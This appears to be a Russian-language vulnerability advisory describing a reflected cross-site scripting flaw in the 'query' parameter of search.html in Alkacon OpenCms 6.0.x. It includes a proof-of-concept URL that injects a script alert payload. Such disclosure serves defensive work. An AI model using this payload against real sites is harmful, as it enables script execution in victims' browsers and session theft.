Программа: Alkacon OpenCms 6.0.0, 6.0.2 и 6.0.3, возможно другие версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "query"
сценария "search.html". Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольный код сценария в браузере жертвы в
контексте безопасности уязвимого сайта.

Пример:

http://host/opencms/opencms /system/modules/org.opencms .frontend.templateone/pages
/search.html?action=search &query=%22%3E%3Cscript%3Ealert
%28’www.eazel.es’%29%3C %2Fscript%3E%3C!-&index=Online +project+%28VFS%29&page=1&uri=
%2Fxmlcontentdemo%2Fside _element_demo.html&__locale=en
&query2=%3Cscript%3Ealert%28a %29%3C%2Fscript%3E
 



Оставить мнение